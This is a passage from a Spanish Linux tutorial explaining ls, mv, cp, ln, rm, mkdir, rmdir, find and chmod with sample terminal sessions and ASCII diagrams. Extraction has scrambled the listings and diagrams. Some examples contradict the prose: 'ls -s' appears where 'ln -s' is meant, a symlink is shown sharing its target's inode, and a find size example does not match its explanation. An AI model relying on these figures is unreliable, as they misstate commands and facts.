-rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--rw-r--r--

1 1 1 1 1 1 1 1

root root root root root root root root

root root root root root root root root

143078 252411 677963 766699 288856 92157 2643205 140918

Apr Apr Apr Apr Apr Apr Apr Apr

9 9 9 9 9 9 9 9

04:50 04:11 04:27 04:13 04:20 04:18 04:37 04:51

hpdj-2.5.tar.gz kalendar-0.5b.tar.gz kget-0.6.1.tgz korganizer-1.1.tar.gz kpackage-1.2.tgz kuser-0.6.0.tar.gz qt-1.42.tar.gz xtexcad-2.1.tar.z

Figura 7.4: Listado en formato largo del contenido de un directorio Sobre el ejemplo anterior se pueden notar varios puntos interesantes: * Cada archivo o directorio es mostrado en una linea separada acompa~ado de toda su informacion adicional. * La primer columna de la lista, la cual es una serie de simbolos, especifica que permisos posee el archivo, pero ademas nos muestra, mediante el primer caracter, el tipo del archivo. Los diferentes codigos que se utilizan se muestran en la tabla 7.1. * La primera entrada en la lista se diferencia de todas las demas porque el codigo de tipo de archivo es "d", lo que significa que es un directorio, mientras que todas las demas entradas muestran "-" lo que nos informa que son archivos ordinarios. * La columna siguiente especifica la cantidad de hard links que posee el archivo. En el caso del directorio Xfree86 vemos que posee 2 mientras que los demas archivos todos tiene un solo link. El directorio posee 2 links porque uno es creado por el directorio en si mismo y el otro es la entrada que se nombra "." que todo directorio contiene y que apunta a si mismo. Cada directorio tiene ademas otra entrada denominada ".." que apunta a su padre. Esto quiere decir que si un directorio "dir" tiene 4 subdirectorios, entonces cada uno de estos poseera una entrada ".." que apuntara a "dir". Por lo tanto, el direcotrio "dir" tendra asociados 6 links: uno que represente al directorio, uno por la entrada "." dentro de el, y uno por cada subdirectorio que posea. Esta situacion se muestra en la figura 7.5. * Las siguientes columnas especifican el usuario que es due~o del archivo o directorio, y el grupo al que pertenece. * La columna que sigue nos muestra el tama~o del archivo, pero este tama~o es especificado en bloques. Esto es porque el S.O. utiliza bloques como la unidad de transferencia entre memoria y los dispositivos de bloques utilizados (discos rigidos, CD-ROM's, disketteras, etc). Tanto los archivos como los directorios pueden tener un numero cualquiera de bloques. En gral., en Linux, se utilizan bloques de 1KB o sea (1024 bytes), pero esto no siempre es verdad ya que pueden utilizarse tambien bloques de 512 bytes. * La siguiente columna nos muestra el momento en el que se modifico por ultima vez el archivo o el directorio. NOTA: Disculpen semjante dibujo, pero es que si lo hacia mas chico, mo se iba a entender demasiado ;) _____ ______ ________ | | | | | mnt | Tony | README | |_____|______|________|

\ ________________________\|/___________________ | | | | | | /-->| . | dir1 | dir2 | dir3 | dir4 | <--------------------------\ | |_________|_________|________|________|________| \ 2 | | | /|\ | | | /|\ \ \ \_____/ | | | | \ \ \ \ | | | \ \ \ \_________________ _ \ / | | \ \ \ ______ \ \ 6 / | \ \ \ \ 5 \____ \ / \ \ \ \_____ \_______ \ \ / 3 | \ 4 \ \ \ | | __________\|/______ | _______ _\|/____ | __\|/__ _______ | __\|/________ | | | | / | | | | | | | | | | | | /-->| . | .. |--/ /->| . | .. |--/ /-->| . | .. |-/ /-->| . | .. |--/ | |_________|_________| | |_______|________| | |_______|_______| | |______|______| | | | | | | | | \_____/ \_____/ \_____/ \_____/ Figura 7.5: Links definidos sobre un directorio. ______________________________________________ | Codigo | Significado | ||| | | Archivo ordinario | | d | Directorio | | c | Archivo de dispositivo de caracter | | b | Archivo de dispositivo de bloque | | l | Link simbolico | | p | Archivo de ca~eria | Tabla 7.1: Codigos de tipos de archivos y sus significados. LISTADO DE ARCHIVOS OCULTOS Se pueden notar, en los ejemplos anteriores, que tanto el listado predefinido como el listado largo producidos por el comando ls no nos muestran los archivos ocultos, es decir aquellos que su nombre comienza con un punto ".". Para listar los archivos ocultos es necesario especificar la opcion -a. Un ejemplo de listado de archivos ocultos se muestra en la figura 7.6.

\ 1 \

LISTADO DE DIRECTORIOS Hemos dicho que le podemos pasar varios argumentos al comando ls. Estos argumentos pueden ser archivos o directorios. Supongamos que queremos averiguar los permisos que tiene un archivo determinado. Para ello ejecutamos: ==> ls -l <archivo> Como muestra la figura 7.7a. La ejecucion del comando tendra como resultado una unica linea correspondiente al archivo solicitado y su informacion correspondiente. Supongamos que, ahora, queremos averiguar los permisos que tiene seteados un cierto directorio. Intuitivamente se puede pensar que ejecutando ls -l <directorio> vamos a obtener la misma informacion que obtuvimos con el archivo. Veamos la figura 7.7b cual es el resultado. Imagino que adivinaron cual es el problema. En caso de que no, piensen lo siguiente: el comado ls cuando recibe un argumento decide si el mismo es un archivo o un directorio. En caso de ser un archivo lista la informacion solicitada del mismo y en caso de ser un directorio lista la informacion para cada archivo que se encuentre dentro del direcotorio especificado. Para que el comando nos liste solo la informacion del directorio y no de su contenido es necesario especificar la opcion -d (directory). El comando quedara de la siguiente forma: ==> ls -dl <directorio> Ver figura 7.7c. 7.3 MANIPULANDO ARCHIVOS Los comandos mv (move), cp (copy), ln (link) y rm (remove), junto con ls son los comandos mas importantes a la hora de manipular los archivos de Linux. Move y copy se utilizan para mover archivos de un lado a otro en el sistema de archivos. La unica diferencia entre ellos es que move borra el archivo original y copy no. El comando link se utiliza para establecer pseudonimos a los archivos (links). Para borrar los archivos utilizamos el comando remove. 7.3.1 MOVIENDO Y COPIANDO ARCHIVOS El comando mv mueve un archivo de un sitio a otro. Si ambos sitios se encuentran en el mismo sistema de archivos, entonces el movimiento es esencialmente una operacion de renombre. Si por el contrario, los sitios se encuentran en distintos sistemas de archivos entonces se realiza una copia y luego se borra la original. La sintaxis del comando mv es: ==> mv [opciones] fuente.. destino Donde las opciones son opcionales, valga la redundancia, y fuente... significa que podemos especificar varios argumentos de fuente, pero solo uno de destino. Vemos varios ejemplos en la figura 7.8. En el primer ejemplo (figura 7.8a) utilizamos mv para cambiar el nombre de un archivo. En el ejemplo siguiente (figura 7.8b) movemos un archivo de un directorio a otro y en el ultimo ejemplo (figura 7.8c) movemos varios archivos. # ls -l penguinc06.gif -rw-r--r-- 1 root root 8994 Apr 9 04:42 penguinc06.gif

a. Listando la informacion de un archivo.

# ls -l Xfree86/ total 6756 -rw-r--r-- 1 root -rw-r--r-- 1 root -rw-r--r-- 1 root -rw-r--r-- 1 root -rw-r--r-- 1 root -rw-r--r-- 1 root . . .

root root root root root root

21268 818655 2587331 3340 311690 1284484

Mar Mar Mar Mar Mar Mar

22 22 22 22 22 22

20:27 21:04 20:53 20:39 20:34 20:50

README XVG16.tgz Xbin.tgz Xcfg.tgz Xdoc.tgz Xfonts.tgz

b. Intento fallido de listado de informacion de un directorio. # ls -dl Xfree86/ drwx------ 2 root root 1024 Mar 22 20:55 Xfree86/

c. Intento exitoso. Figura 7.7: Listando direcotorios e informacion sobre direcotorios. Para copiar archivos utilizamos el comando cp que se comporta de forma similar a mv, pero con la salvedad de que no borra la fuente del archivo original. Al igual que mv acpeta multiples argumentos siempre y cuando el ultimo de ellos sea un directorio. En el ejemplo de la figura 7.9a realizamos una copia de un archivo en el directorio donde este se encuentra; en el ejemplo de la figura 7.9b copiamos el mismo archivo pero en otro directorio y en el utimo ejemplo (figura 7.9c) copiamos varios archivos en un directorio. COPIANDO DIRECTORIOS Si necesita copiar un directorio en vez de archivos, debemos especificar la opcion -R o -r (recursive) ya que sino el comando omitira cada argumento fuente que sea un directorio y no sera copiado. En caso de proveer esta opcion, todo argumento que corresponda a un directorio sera copiado (incluyendo todos sus subdirectorios y los subdirectorios de estos y etc) en el directorio destino especificado. Veamos un ejemplo en le figura 7.10. Supongamos que queremos copiar el directorio mail -que es subdirecotorio de Tony- completo con sus archivos en el directorio /backup que se encuentra vacio. Para ello ejecutamos: ==> cp -r mail/ /backup/ # ls kernel-2.1.125 kernel-2.2.1 kernel-2.2.5 # mv kernel-2.2.5 kernel # ls kernel kernel-2.1.125 kernel-2.2.1 a. Utilizando mv para renombrar archivos # ls kernel kernel-2.1.125 kernel-2.2.1 # mv kernel ../config/ # ls ../config/ kernel # ls kernel-2.1.125 kernel-2.2.1

b. Moviendo un archivo de un directorio a otro. # ls kernel-2.1.125 kernel-2.2.1 # mv kernel* ../config/ # ls ../config/ kernel-2.1.125 kernel-2.2.1 # ls kernel-2.2.5 kernel-2.2.5

c. Moviendo varios archivos de un directorio a otro. Figura 7.8: Moviendo archivos. En la figura 7.10 se muestra el arbol resultante una vez realizada la copia. El directorio que se copio se muestra resaltado con una elipse 7.3.2 REALIZANDO LINKS Como vimos en la seccion 2.1.6 los "links" sirven para establecer pseudonimos entre los archivos, es decir para que un mismo archivo fisico sea referenciado por varios nombres logicos. En la terminologia de Linux estos pseudonimos son llamados "links". Como tambien ya vimos, existen dos tipos de links: hard links y links simbolicos. Primero veremos los hard links y despues nos ocuparemos de los simbolicos. El comando ln es el utilizado en Linux para establecer los links. CREANDO Y MANIPULANDO HARD LINKS Los hard links se crean con el comando ln. Supongamos que queremos crear un link llamado index.htm a un archivo que se llama presentacion.htm. El comando para realizar esto se muestra en la figura 7.11. Una vez creado el hard link, tanto el viejo nombre del archivo (presentacio.htm) como el nuevo (index.htm) se refieren al mismo archivo, es decir a los mismos datos en la misma locacion fisica del disco. Una vez creados los links, podemos ver los numeros de i-nodo asociados a cada nombre de archivo ejecutando el comando siguiente: ==> ls -i # pwd /usr/local/articles/NT lies/ # ls Lies.htm lie10.jpg lie3.jpg lie1.jpg lie2.jpg lie4.jpg # cp Lies.htm index.htm # ls Lies.htm lie1.jpg lie2.jpg index.htm lie10.jpg lie3.jpg

lie5.jpg lie7.jpg lie9.jpg lie6.jpg lie8.jpg lie4.jpg lie6.jpg lie8.jpg lie5.jpg lie7.jpg lie9.jpg

a. Copiando un archivo sobre un mismo directorio. # ls Lies.htm lie1.jpg lie2.jpg lie4.jpg lie6.jpg lie8.jpg index.htm lie10.jpg lie3.jpg lie5.jpg lie7.jpg lie9.jpg # cp Lies.htm /root/articles/ # ls /root/articles/ Lies.htm

b. Copiando un archivo hacia otro directorio. # ls Lies.htm lie1.jpg lie2.jpg index.htm lie10.jpg lie3.jpg # cp lie* /root/articles/ # ls /root/articles/ Lies.htm lie10.jpg lie3.jpg lie1.jpg lie2.jpg lie4.jpg lie4.jpg lie6.jpg lie8.jpg lie5.jpg lie7.jpg lie9.jpg lie5.jpg lie7.jpg lie9.jpg lie6.jpg lie8.jpg

c. Copiando varios archivos. Figura 7.9: Copiando archivos. En la figura 7.11 vemos que tanto el archivo el archivo presentacion.htm como el archivo index.htm poseen el mismo numero de i-nodo, lo que quiere decir que ambos nombres se refieren al mismo "archivo fisico". Esto se ilustra en la figura 7.12a. A partir de esto, es valido acceder al archivo con cualquiera de los dos nombres que este posee. Es importante notar que si modificamos el archivo presentacion.htm, por lo dicho anteriormente, tambien modificamos el archivo index.htm. En la figura 7.11, antes de crear el hard link, listamos los detalles del archivo presentacion.htm y vemos que el numero de links del mismo es 1. Cuando listamos por segunada vez, luego de haber creado el hard link, vemos que el numero de links de ambos archivos es 2. Ademas de esto notemos que todos los atributos restantes son iguales, incluyendo los permisos. / _______________________ | mnt | Tony | backup | /|\ __________________ / \ \ / \ / __\____________ \ | ________ \______ @ | prog | mail | \------+-| mail | \ \ | \ \ \ | \ \ \ \_______ \ ____________________ \ \ \

| | |

| mod1 | mod2 | exec | _\_______________ | _____\___________ ||| | | | | | | @ @ @ | mess | attach | | | mess | attach | || | || | | | | | @ @ \ \ \________________/ # ls mail/ attach mess # cp -r mail /backup/ # ls /backup/ mail # ls /backup/mail/ attach mess @ @ | |

| | |

Figura 7.10: Copiando directorios recursivamente. OBSERVACIONES ACERCA DE LOS HARD LINKS Los hard links, como ya vimos, relacionan nombres de archivos con numeros de i-nodo. Un sistema de archivos posee un cierto numero de i-nodos con los cuales identifica los archivos que posee. Lo que quiere decir que los i -nodos son relativos a un sistema de archivos particular y que podemos tener dos archivos distintos que se encuentran en distintos sistemas de archivos, pero con el mismo numero de i-nodo. Por esto, no se pueden establecer hard links entre archivos que se encuentren en distintos sistemas de archivos archivos. Esto es una limitacion importante a la hora de utilizar hard links. CREANDO Y MANIPULANDO LINKS SIMBOLICOS Para crear links simbolicos tambien utilizamos el comando ln pero modificamos su comportamiento con la opcion -s, la cual especifica que el link a crear sera un link simbolico. En la figura 7.13 vemos como se crearia un link simbolico index.htm al archivo presentacion.htm. Al listar los contenidos del directorio, una vez creado el link simbolico, vemos que la entrada del archivo index.htm nos informa que el archivo es un link simbolico (atributo 1 en la columna de tipo de archivo). Ademas vemos que el numero de links del archivo presentacion.htm es 1, esto es porque este numero cuenta la cantidad de hard links establecidos y no se contabilizan los links simbolicos. Esto quiere decir que al borrar el archivo presentacion.htm se borraran directamente los contenidos, y el link simbolico quedara destruido, es decir apuntara a algo que ya no existe. # ls -l total 60 -r-------- 1 root # ln presentacion.htm # ls -l ls -l --color=none total 120 -r-------- 2 root -r-------- 2 root # ls -i 262288 index.htm

root index.htm

59997 Apr 28 22:47 presentacion.htm

root root

59997 Apr 28 22:47 index.htm 59997 Apr 28 22:47 presentacion.htm

262288 presentacion.htm

Figura 7.11: Estableciendo hard links. Otra cosa para notar en el listado, es que la columna respectiva al nombre de los archivos, vemos que el archivo index.htm apunta al archivo presentacion.htm. Es importante tener en cuenta que estos archivos son dos archivos separados. Es decir que cada uno tiene sus atributos propios. Por ejemplo, en la figura 7.13 vemos que los archivos tiene distintos tama~os, distintas fechas de modificacion, etc. Al realizar la consulta de los numeros de i-nodo de los archivos, vemos tambien que ambos archivos tiene distinto numero de i-nodo, lo que quiere decir que ambos tienen un lugar fisico distinto en el medio donde se almacenan.

Anteriormente, vimos que no es posible crear hard links entre archivos que se encuentran en distintos sistemas de archivos. Con los links simbolicos, esto no es problema, ya que la asociacion se realiza por nombre y no por numero de i-nodo. Ver figura 7.12b. Al crear los links simbolicos, debemos tener cuidado con la forma en que los creamos, ya que podemos hacerlo mediante una ruta relativa o una ruta absoluta. Un problema que podemos tener si creamos un link con una ruta relativa, es que si movemos el link a otro lugar del sistema de archivos, perderemos la asociacion entre los archivos. Con los links absolutos, esto no es problema. Observacion: Si borramos el archivo que es link simbolico, este sera eliminado pero no se borrara el archivo al cual apunta. Para borrar el archivo apuntado debemos borrar este directamente. __________ | | | | _______ | | | | index.htm -----------. | | .----->| | | | | | |_______| presentacion.htm --. | | | | | ->|----------|___| Archivo --->|__________| | | |__________| Tabla de i-nodos a. Un hard link entre los archivos presentacion.htm e index.htm. __________ | | | | _______ index.htm | | | | | | | .----->| | \|/ | | | |_______| presentacion.htm --. | | | | |----------|___| Archivo --->|__________| | | |__________| Tabla de i-nodos b. Un link simbolico del archivo index.htm al archivo presentacion.htm Figura 7.12: Estructura logica de los links entre archivos. 7.3.3 ELIMINANDO ARCHIVOS Para eliminar archivos ordinarios, utilizamos el comando rm (remove). Vemos un ejemplo en la figura 7.14. Debemos tener en cuenta que para poder eliminar archivos debemos tener permiso de escritura en el directorio donde se encuentren los archivos. Si tenemos permiso de escritura sobre el archivo a borrar, entonces el mismo sera borrado directamente. En cambio, si no tenemos permiso de escritura sobre el archivo, entonces el comando nos preguntara si queremos ignorar la

proteccion y borrarlo igualmente. Si contestamos "y" (yes), el archivo sera borrado, solo si somos due~o del mismo, sino obtendremos un mensaje que nos indicara que no tenemos permiso para borrar el archivo. Esto es ilustrado en la figura 7.14: el archivo vi.htm tiene permiso de escritura, por lo que es borrado inmediatamente. En cambio el archivo persentacion.htm no tiene seteado el permiso de escritura, por lo que el comando nos preguntara si queremos ignorar la proteccion. Contestamos que si y el archivo es eliminado. Se debe tener mucho cuidado cuando eliminamos archivo en Linux, ya que los archivos eliminados realmente SE PIERDEN Y NO HAY FORMA DE RECUPERARLOS. No existe ningun mecanismo de recuperacion de archivos en Linux. Siempre que estemos en duda de borrar un archivo, pensemos en preservarlo ya que no tendremos forma de recuperarlo. OPCIONES DEL COMANDO RM Las opciones mas importantes del comando rm son las siguientes: * -f: Forzar la eliminacion de los archivos sin permiso de escritura sin pedir la confirmacion. * -i: Operacion interactiva. Realizar una confirmacion antes de eliminar cada archivo. Las respuestas que comienzan con y o Y son consideradas afirmativas. * -r: Operacion recursiva. Elimina archivos y subdirectorios, borrando todo un subarbol de directorios. # ls presentacion.htm # ls -s presentacio.htm index.htm # ls -l total 60 lrwxrwxrwx 1 root root 16 Apr 29 19:11 index.htm -> presentacio n.htm -r-------- 1 root root 59997 Apr 28 22:47 presentacion.htm # ls -i 262269 index.htm 262269 presentacion.htm Figura 7.13: Estableciendo links simbolicos. # ls -l total 14 -rw-r--r-- 1 gg users 7559 May 2 -r-------- 1 gg users 2880 May 2 -rw-r--r-- 1 gg users 2880 May 2 # rm vi.htm # rm presentacion.htm rm: remove 'presentacion.htm', overriding mode # ls commands.htm

01:15 commands.htm 01:15 presentacion.htm 01:15 vi.htm 0400? y

Figura 7.14: Eliminando archivos. 7.4 MANIPULANDO DIRECTORIOS 7.4.1 CREANDO DIRECTORIOS Para organizar nuestros archivos utilizamos directorios y subdirectorios. La

creacion de directorios tambien se realiza mediante comandos. El comando para crear directorios es mkdir (make directory). El mismo acepta una lista de argumentos (cada argumento puede ser una rura absoluta o una rura relativa) y crea un directorio por cada argumento que se encuentre en la lista. Los directorios, una vez creados, se encuentran vacios. Veamos un ejemplo en la figura 7.15. primero creamos un directorio llamado qt, verificamos que haya sido creado y vemos que esta vacio. Luego creamos tres directorios juntos (c, java. c++). # la # mkdir qt # ls qt # ls qt # mkdir c java c++ # ls c c++ java

qt

Figura 7.15: Creando directorios. 7.4.2 ELIMINANDO DIRECTORIOS Tenemos dos formas de eliminar directorios: 1. Utilizando el comando rm con la opcion -r (recursive). Esto borrara un directorio junto a todo su contenido (archivos y subdirectorios) eliminando asi todo un subarbol. 2. Utilizando el comando rmdir (remove directory). Este comando nos permite eliminar directorios pero con la exigencia de que los mismos esten vacios. Si queremos borrar un directorio que tiene archivos dentro, debemos, primero, eliminar los mismo com rm y luego eliminar el directorio con rmdir. Ilustramos ambas formas en la figura 7.16. En la figura 7.16a, borramos el directorio com rm -r y en la figura 7.16b lo hacemos con rmdir. Notemos, en el primer caso, que el comando nos pide confirmacion para cada archivo o directorio que se encuentre en el directorio a borrar. Esto se puede evitar utilizando rm -rf, ya que la opcion -f (force), hace que no se realicen las confirmaciones y borra directamente. En el segundo caso, primero debemos vaciar el directorio (en este caso lo hacemos con rm -f) y luego debemos eliminar el directorio con rmdir. 7.5 BUSQUEDA DE ARCHIVOS En ocasiones podemos estar interesados en averiguar donde se encuentran determinados archivos. Cuando queremos buscar uno o mas archivos dentro de un directorio en particular, podemos utilizar el comando ls para listar los archivos y verificar en la lista si el/los mismos se encuentran alli. Pero cuando queremos buscar archivos en todo un subarbol de directorios, trabajar con ls puede resultar muy incomodo. El comando find (buscar), localiza archivos, de acuerdo a un criterio de busqueda, en todo un subarbol de directorios y nos reporta los resultados. Los criterios de busqueda del comando find se pueden ser combinar para realizar busquedas realmente complejas. Aqui vamos a estudiar los criterios mas utilizados a nivel usuario que a su vez son los mas sencillos.

La sintaxis del commando find es la siguiente: ==> find <path...> <criterio> * <path...> es una lista de directorios donde se comenzara a buscar. find buscara en los subarboles que comienzan en cada directorio especificado en la lista de directorios. * <criterio> es una serie de acciones, tests y opciones que especifican un cierto criterio de busqueda y posiblemente ciertas acciones a realizar sobre los archivos encontrados. Esto se vera mas adelante. # ls c c++ java qt # ls java hello-world.class hello-world.java # rm -r java rm:descend directory 'java'? y rm: remove 'java/hello-world.java'? y rm: remove 'java/hello-world.class'? y rm: remove directory 'java' y # ls c c++ qt a. Eliminando un directorio con rm -r. # ls c c++ java qt # ls java hello-world.class hello-world.java # rmdir java rmdir: java: Directory not empty # rm -f java/* # rmdir java # ls c c++ qt b. Eliminando un directorio con rmdir. Figura 7.16: Eliminando directorios No vamos a analizar detalladamente la sintaxis de la expresion que denota los criterios de busqueda, sino que vamos a ilustrar el uso del comando find con varios criterios de busqueda tipicos. 7.5.1 EJEMPLOS DEL USO DE FIND BUSCANDO ARCHIVOS POR NOMBRE Supongamos que queremos buscar todos los archivos que comiencen con X en el subarbol que encabeza el directorio /etc. El comando utilizado para realizar la busqueda y el resultado de la misma se muestran en la figura 7.17. En este ejemplo, para realizar la busqueda, le pasamos como ruta de comienzo el directorio /etc y la expresion que especifica que el criterio es -name X*. La opcion -name especifica al comando find que queremos realizar la busqueda por nombre de archivo y el argumento X* expresa que queremos buscar los archivos cuyo nombres comiencen con X.

En general, la busqueda de archivos por nombre se realiza con el siguiente comando: ==> find <path> -name <expresion> Donde la expresion especifica el formato de los nombres a buscar. Para formar la expresion podemos utilizar todas las capacidades de generacion de nombres de archivo que nos prove la shell (ver seccion 6.5). # find /etc -name X* /etc/X11 /etc/X11/xinit/Xclients /etc/X11/xdm/Xaccess /etc/X11/xdm/Xresources /etc/X11/xdm/Xservers /etc/X11/xdm/Xsession /etc/X11/xdm/Xsetup_0 /etc/X11/X /etc/X11/XF86Config Figura 7.17: Buscando archivos por nombre. BUSCANDO ARCHIVOS POR TAMA~O Otro uso comun del comando find es la busqueda de archivos por tama~o. Para buscar archivos por tama~o, en vez de utilizar la opcion -name utilizamos la opcion -size. A continuacion de esta opcion debemos especificar el tama~o de los archivos a buscar y ademas si queremos buscar archivos mas grandes o mas chicos que el tama~o especificado. Veamos un ejemplo en la figura 7.18. # find /mp3 -size +700k /mp3/Nirvana/Lithium.mp3 /mp3/Black Sabbath/paranoid/War Pigs.mp3 /mp3/Led Zeppelin/Stairway to Heaven.mp3 Figura 7.18: Buscando archivos por tama~o. En este ejemplo, queremos encontrar todos los archivos que tengan un tama~o mayor a 7000 Kbytes, a partir del directorio /mp3. Debemos realizar dos observaciones: * El signo "+" que prefijamos al argumento que especifica el tama~o obliga al comando find a realizar un test. En este caso testeara que el tama~o del archivo sea mayor a 7000 Kbytes. En caso de querer buscar archivos de un tama~o menor al argumento debemos prefijar el simbolo "-". Si no usamos ningun simbolo, find buscara archivos cuyo tama~o sea exactamente igual al argumento especificado. * La letra "k" que agregamos luego del argumento informa a find que la unidad a utilizar sera Kbytes. Tambien podemos utilizar: - "c": Bytes - "w": Palabras (words) de 2 bytes cada una - "b": Bloques de 512 bytes cada uno (esta opcion es utilizada por defecto si no especificamos ninguna). BUSCANDO ARCHIVOS POR FECHA DE MODIFICACION

Otra manera de utilizar el comando find para buscar archivos es utilizando criterios de busqueda basados en fechas de modificacion de los archivos. En este caso la opcion a utilizar es -mtime (modified time). Vemos un ejemplo en la figura 7.19. # find /gome/tony/html -name *.htm -mtime -6 /home/tony/html/commands.htm /home/tony/html/vi.htm Figura 7.19: Buscando archivos por fecha de modificacion. El argumento de la opcion -mtime es un numero que especifica la cantidad de dias. Si prefijamos un "-", entonces find buscara archivos que hayan sido modificados dentro de la cantidad de dias especificada. Si prefijamos un "+" al argumento, entonces se buscaran archivos que no hayan sido modificados en ese periodo. Esto es particularmente util cuando queremos generar listas de archivos viejos. En este ejemplo, ilustramos como es posible combinar opciones para formar criterios de busqueda mas avanzados. En este caso solo seran devueltos como resultado los nombres de los archivos que terminen con ".htm" y hayan sido modificados en los ultimos 6 dias. EFECTUANDO ACCIONES SOBRE LOS ARCHIVOS ENCONTRADOS El comando find nos permite realizar ciertas acciones sobre los archivos que se van encontrando como resultado de la busqueda. Esta es una caracteristica muy util de este sistema. Cuando un programa de Linux falla, el S.O. escribe, en el directorio de trabajo que el programa tenia en el momento de la falla, un archivo (usualmente muy grande) llamado core que se utiliza para realizar un analisis de las causas por las que el programa fallo. En un sistema que se utiliza para el desarrollo de programas estos archivos son muy utiles, pero en la mayoria de los sistemas estos archivos no tienen utilidad y pueden ser purgados periodicamente. En la figura 7.20 mostramos un comando find que buscara en todo el sistema de archivos a los archivos que se llamen "core" y los eliminara. # find / -name core -exec rm {} \; rm: /proc/sys/net/core: is a directory find: /proc/410/fd: Permission denied find: /proc/411/fd: Permission denied find: /proc/433/fd: Permission denied rm: /usr/src/linux-2.2.5/net/core: is a directory Figura 7.20: Eliminando los archivos encontrados por find. Vamos a analizar en detalle el comando utilizado: * La opcion -exec nos permite especificar un comando a realizar sobre cada archivo que find encuentra. El argumento de esta opcion es un comando. En este caso utilizamos el comando rm para que elimine los archivos encontrados. * Las llaves "{}" que agregamos a continuacion del comando rm seran reemplazadas por find con el nombre de cada archivo encontrado. Asi el comando rm tendra especificado como argumento el nombre de archivo correcto y podra eliminarlo.

* La sintaxis del comando find nos obliga a colocar, luego del argumento a la opcion -exec, un punto y coma ";". Pero como la shell le otorga a este simbolo un significado especial (es el separador de comandos) debemos utilizar la barra "\" como caracter de escape para que la shell no interprete que queremos utilizarlo como separador de comandos. Veremos mas sobre esto en los capitulos siguientes. OTROS USOS DEL COMANDO FIND Es posible utilizar el comando find para realizar busquedas basadas en muchos otros criterios, por ejemplo: * Buscar archivos vacios (-empty) * Buscar archivos pertenecientes a grupos de usuarios (-group) * Buscar archivos por nombre, pero que la evaluacion se realice sin diferenciar letras minusculas y mayusculas (-iname) * Buscar archivos por numero de links (-links) * Buscar archivos por tipos (directorios, links simbolicos, etc) (-type) * Buscar archivos por usuario (-user) 7.6 CAMBIANDO PERMISOS, GRUPOS Y DUEOS La habilidad de poder especificar los permisos, grupos y due~os de los archivos para cada archivo en particular es uno de los puntos mas fuertes del S.O. Linux y de todos los demas UNIX. Los comandos chmos (change mode), chown (change owner) y chgrp (change group) se utilizan para cambiar los derechos de acceso de los archivos y directorios. Se debe tener en cuenta que para poder cambiar los derechos de acceso de un archivo debemos ser due~o del mismo. Existe una excepcion a esta regla que es el "superusuario" :). EL SUPERUSUARIO PUEDE CAMBIAR LOS DERECHOS DE ACCESO DE CUALQUIER ARCHIVO O DIRECTORIO. Como vimos anteriormente, las tres operaciones que pueden ser realizadas sobre un archivo son: lectura, escritura y ejecucion. Por cada archivo existen tres niveles de privilegio: * user: es el due~o del archivo * group: es el grupo a el cual pertenece el archivo * others: es el universos (otros usuarios) de usuarios restantes Por cada nivel de privilegio, es posible setear los permisos para las tres operaciones de cada archivo o directorio. Mas especificamente por cada nivel de privilegio, cada operacion puede estar permitida o denegada. 7.6.1 AVERIGUANDO LOS DERECHOS DE ACCESO DE UN ARCHIVO Para averiguar que permisos tiene un archivo, que usuario es due~o y a que grupo pertenece, podemos utilizar el comando ls -l que nos muestra un listado largo de los archivos. Por ejemplo: # ls -l total 15 -rw-r--r--

1 tony

users

7559 May 12 04:31 commands.htm

-rw-r--r--rw-r--r--

1 tony 1 tony

users users

3817 May 12 04:31 krabber-2.html 2880 May 12 04:31 vi.htm

Cada entrada del listado, en su comienzo, tiene una serie de simbolos que especifican los permisos del archivo. La tercer columna de la entrada muestra el usuario due~o del archivo y la columna siguiente especifica el grupo al cual pertenece el archivo. En este caso el due~o de los archivos es el usuario tony y los mismos pertenecen al grupo users. La identificacion de los permisos es un poco mas complicada. La informacion de los permisos de cada archivo se encuentra en el primer campo de la entrada del listado. Este campo es una serie de simbolos. El primer simbolo especifica el tipo de archivo (ver tabla 7.1). Los demas simbolos especifican los permisos seteados sobre el archivo. El formato es el siguiente (ver figura 7.21): * Los tres primeros simbolos especifican los permisos de lectura, escritura y ejecucion para el usuario due~o del archivo. * Los siguientes tres simbolos especifican los permisos del archivo para los usuarios que pertenecen al grupo al cual el archivo pertenece. * Los ultimos tres simbolos muestran los permisos del universo restante. _________ Permisos del due~o | | ___ Permisos del grupo _|_ _|_ | | | | -rwxrwxrwx | ||||_____ Permiso de ejecucion |||______ Permiso de escritura | |_______ Permiso de lectura | |_______Permisos del grupo Figura 7.21: Permisos de un archivo Los tres simbolos de cada uno de los tres niveles de privilegio se interpreta de la siguiente manera: 1. "r" el archivo tiene permiso de lectura en este nivel de privilegio. 2. "w" el archivo tiene permiso de escritura en este nivel de privilegio. 3. "x" el archivo tiene permiso de ejecucion en este nivel de privilegio. En cualquiera de los casos, un simbolo "-" significa que no se tiene el permiso determinado. En el ejemplo anterior, los tres archivos tienen permiso de lectura para todos los niveles de privilegio, pero solo el due~o tiene permiso de escritura y ninguno de los niveles tiene permiso de ejecucion, lo que quiere decir que nadie podra ejecuar ninguno de los archivos. Esto tiene sentido ya que no son ejecutables, son archivos "html" de hipertexto. Es usual que los miembros del grupo tengan los mismos o menos privilegios que el due~o del archivo y que los demas usuarios tengan los mismos o menos privilegios que los de los miembros del grupo, pero Linux no nos impone ninguna restriccion sobre el seteo de los permisos. Facilmente podemos hacer que un archivo no pueda ser leido por su due~o pero que los demas usuarios

puedan hacerlo. (Aunque no tendria sentido desde un punto de vista practico). 7.6.2 CAMBIANDO LOS PERMISOS Existen dos formas de cambiar los permisos con el comando chmod. Una de ellas es utilizando el modo simbolico y la trataremos a continuacion. La otra forma es utilizando el modo numerico octal y usualmente es !!ODIADA!! por los usuarios novatos. Esta forma sera tratada en segundo termino. MODOS DE ACCESO SIMBOLICOS Una palabra de control de modos de acceso simbolica consiste en tres partes: quienes, operador y permisos. "Quienes" especifica sobre que niveles de privilegio setearemos los permisos. El "operador" es la operacion a plicar: agregar, quitar o setear los permisos. Veamos un ejemplo en la figura 7.22. # ls -l -rw-r--r-- 1 tony # chmod go-r file # ls -l -rw------- 1 tony # chmod g=u file # ls -l -rw-rw---- 1 tony users users users 1090 May 29 17:04 file 1090 May 29 17:04 file 1090 May 29 17:04 file

